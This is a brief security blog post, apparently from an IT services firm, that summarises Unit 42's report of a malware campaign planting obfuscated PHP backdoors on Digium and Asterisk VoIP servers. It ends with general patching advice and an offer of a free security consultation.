Large-scale targeted attacks are becoming a widespread issue for many US-based companies making no one safe from the possibility of becoming their next victim.
Voice Over Internet Protocol (VoIP) phone systems using the Digium software are just the latest target of an attack campaign
The hackers put code on their servers designed to exfiltrate data via downloading and perform additional tasks for the hackers. In more technical terms, according to Palo Alto Networks’ security team Unit 42, “[this] malware installs multilayer obfuscated PHP backdoors to the web server’s file system, downloads new payloads for execution, and schedules recurring tasks to re-infect the host system.”
The hack of the Digium VoIP software is not the first of its kind in recent months. An uptake in unusual activity is said to have begun in mid-December 2021 when bad actors target Asterisk, which is a commonly used software that runs on the open-source Elastix Unified Communications Server. Unit 42 reports witnessing more than 500,000 unique samples over the period spanning from December 2021 to March 2022.
According to Unit 42, the newest invasion of the Digium software resembles that of a prior attack in November 2020, called the INJ3CTOR3 campaign. The malware is also used to maintain a backdoor into the system that they can use to steal other information.
The tactic that these hackers have used to infiltrate the Digium software is not a new one and experts do not see it stopping anytime soon.
To be clear, no phone system (or any other system) that we’ve ever seen is inherently secure or immune to attack. The Asterisk phone system software is very popular, as is its commercial version, Digium.
If your company relies on Digium or Asterisk-based phone systems, there are ways to protect them, and we encourage you to have a full security check completed as soon as possible on your phone system.
Any system that is possibly connected to the internet should regularly be audited for security issues, protected with all possible and appropriate protections, and kept up to date with the latest security patches.
If you need help with your Digium, Asterisk, or any other VoIP phone system or to talk with our security team about conducting a security review of your systems, you can set up a confidential free consult with our security team by calling us today at 225-224-6595.
